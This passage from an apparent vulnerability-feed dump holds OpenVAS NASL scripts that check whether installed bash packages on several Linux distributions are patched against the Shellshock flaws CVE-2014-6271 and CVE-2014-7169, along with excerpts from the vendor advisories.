script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3075\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3075.html\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.el6_5.1.0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.1.2~15.el6_5.1.0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:43", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Ubuntu Update for bash USN-2363-2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310841986", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841986", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2363_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for bash USN-2363-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841986\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 17:00:26 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for bash USN-2363-2\");\n script_tag(name:\"insight\", value:\"USN-2363-1 fixed a vulnerability in Bash. Due to a build issue, the patch\nfor CVE-2014-7169 didn't get properly applied in the Ubuntu 14.04 LTS\npackage. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nTavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. An attacker could use this issue to bypass\ncertain environment restrictions. (CVE-2014-7169)\");\n script_tag(name:\"affected\", value:\"bash on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"USN\", value:\"2363-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2363-2/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.3-7ubuntu1.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:18", "description": "Oracle Linux Local Security Checks ELSA-2014-3076", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3076", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123300", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123300", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3076.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123300\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:01:58 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3076\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3076 - bash security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3076\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3076.html\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.45~5.el7_0.2.0.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2.45~5.el7_0.2.0.1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:32", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "CentOS Update for bash CESA-2014:1306 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310882033", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882033", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bash CESA-2014:1306 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882033\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 17:00:17 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for bash CESA-2014:1306 centos5\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. For more information see the Knowledgebase article at the linked references.\n\nNote: Docker users are advised to use 'yum update' within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"CESA\", value:\"2014:1306\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-September/020591.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~33.el5_10.4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:38", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Fedora Update for bash FEDORA-2014-11514", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868211", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868211", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bash FEDORA-2014-11514\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868211\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:58:18 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for bash FEDORA-2014-11514\");\n script_tag(name:\"affected\", value:\"bash on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-11514\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138679.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.48~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:47", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "CentOS Update for bash CESA-2014:1306 centos7", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310882032", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882032", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bash CESA-2014:1306 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882032\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:59:55 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for bash CESA-2014:1306 centos7\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. For more information see the Knowledgebase article at the linked references.\n\nNote: Docker users are advised to use 'yum update' within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"CESA\", value:\"2014:1306\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-September/020592.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.45~5.el7_0.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2.45~5.el7_0.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:35", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "CentOS Update for bash CESA-2014:1306 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310882031", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882031", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bash CESA-2014:1306 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882031\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:58:09 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for bash CESA-2014:1306 centos6\");\n script_tag(name:\"insight\", value:\"The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. For more information see the Knowledgebase article at the linked references.\n\nNote: Docker users are advised to use 'yum update' within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"bash on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"CESA\", value:\"2014:1306\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-September/020593.html\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/1200223\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.1.2~15.el6_5.2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.1.2~15.el6_5.2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:22", "description": "Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169\n). With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3035-1 (bash - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2019-03-19T00:00:00", "id": "OPENVAS:1361412562310703035", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703035", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3035.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 3035-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703035\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_name(\"Debian Security Advisory DSA 3035-1 (bash - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 17:00:22 +0530 (Wed, 01 Oct 2014)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-3035.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"bash on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy), these problems have been fixed in\nversion 4.2+dfsg-0.1+deb7u3.\n\nWe recommend that you upgrade your bash packages.\");\n script_tag(name:\"summary\", value:\"Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was\nincomplete and could still allow some characters to be injected into\nanother environment (CVE-2014-7169\n). With this update prefix and suffix\nfor environment variable names which contain shell functions are added\nas hardening measure.\n\nAdditionally two out-of-bounds array accesses in the bash parser are\nfixed which were revealed in Red Hat's internal analysis for these\nissues and also independently reported by Todd Sabin.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bash-builtins\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bash-doc\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bash-static\", ver:\"4.2+dfsg-0.1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:39", "description": "This host is installed with GNU Bash Shell\n and is prone to remote command execution vulnerability.", "cvss3": {}, "published": "2014-10-08T00:00:00", "type": "openvas", "title": "GNU Bash Environment Variable Handling 